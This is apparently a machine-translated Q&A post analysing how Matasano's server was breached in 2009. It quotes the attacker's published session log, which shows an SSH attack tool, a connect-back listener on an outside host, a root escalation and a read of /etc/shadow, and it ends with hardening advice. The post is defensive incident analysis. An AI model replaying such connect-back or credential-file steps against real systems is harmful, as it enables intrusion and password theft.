Matasano 是如何被黑的?
來自:http ://seclists.org/fulldisclosure/2009/Jul/0388.html
如果我從以下文章中理解得最好:http: //news.ycombinator.com/item ?id= 723798 Matasano 的人離開了 sshd 網際網路 - 任何建議的解決方案(從程式的角度來看)?
Matasano 是如何被黑的?
從文章中的資訊到完全披露,這是不可能回答的。然而,推測總是很有趣,因為他們確實提供了一些資訊 -
# ./th3_f1n4l_s0lut10n www.matasano.com [-] 連接到 69.61.87.163:22.. [/] 尋找有效的非 root 使用者.. adam ******** R3D4CT3D h4h4h4h4 ********
他們
th3_f1n41_s01ut10n
針對連接到 ssh 埠的 Matasano 的伺服器執行二進制“”。它通過一些未知的方式找到一個有效的非 root 使用者,並且輸出的其餘部分被編輯。# ./th3_f1n4l_s0lut10n -u 亞當 -t 3 www.matasano.com [*] Connectback 監聽器在 209.112.118.10:3338.. [!] SSH2_MSG_SERVICE_ACCEPT [OpenSSH_4.5p1,OpenSSL 0.9.8g 2007 年 10 月 19 日]
使用找到的使用者名再次執行二進製文件,該使用者名登錄並連接回其伺服器的 3338 埠(希望沒有以他們的名義註冊……)。
adam_at_www:~$ uname -a Linux www 2.6.20.1-1-686 #1 SMP Sun Mar 4 12:44:55 UTC 2007 i686 GNU/Linux **** h4h4h4hh4h4h4 l3tz us3 m0r3 !0D4Y!H4H4H4H4H4H4H4 ****
他們可能暗示他們對這個核心有一個 0 天,當你考慮這家公司的股票交易時,這個核心已經很老了。
adam_at_www:~$ cd /tmp *********** B0R1NG *********** root_at_www:~# cat /etc/shadow
哎呀-突然間,使用者現在是root使用者。他們在 /tmp 中有一個本地權限提升漏洞,這可能是他們提到的 0-day。
所以這里至少有兩個漏洞利用——OpenSSH漏洞利用在系統上獲取一個有效的非root使用者,並以該使用者身份登錄,然後是本地權限提升。
考慮到 OpenSSH 自 4.5 版以來存在一些已知的安全問題:
- 5.2 版之前的 OpenSSH 易受 CPNI-957037“針對 SSH 的明文恢復攻擊”中描述的協議弱點的影響。然而,基於可用的有限資訊,這種描述的攻擊似乎在大多數情況下是不可行的。有關更多資訊,請參閱 cbc.adv 諮詢和 OpenSSH 5.2 發行說明。
~/.ssh/rc
對於命令已被 sshd_config(5) ForceCommand 指令覆蓋的會話,OpenSSH 4.9 和更高版本不會執行。這是一個記錄在案但不安全的行為(在 OpenSSH 4.9 發行說明中描述)。- 如 OpenSSH 4.7 發行說明中所述,當不受信任的 cookie 生成失敗(例如,由於故意的資源耗盡)時,OpenSSH 4.7 和更高版本不會回退到創建受信任的 X11 身份驗證 cookie。
我猜想擁有這個較舊的 Linux 核心和較舊的 SSH 守護程序為他們做了。此外,它在他們的 www 伺服器上執行,該伺服器可用於 Internet,在我看來,這是一件非常有信心的事情。闖入的人顯然是想為難他們。
如何防止這些攻擊?
這可以通過主動管理來防止 - 確保任何面向網際網路的服務都得到修補,並限制可以連接的人數,而不是允許人們從任何地方連接。這一事件進一步說明了安全系統管理是困難的,並且需要業務部門的奉獻精神來為 IT 提供時間來保持修補 - 實際上,這不是一件容易發生的事情,至少在較小的公司中是這樣。
最好使用帶大括號的方法 - 使用公鑰身份驗證、在 ssh 守護程序上列入白名單、雙因素身份驗證、IP 限制和/或將所有內容置於 VPN 之後是鎖定它的可能途徑。
我想我知道我明天要在工作中做什麼。:)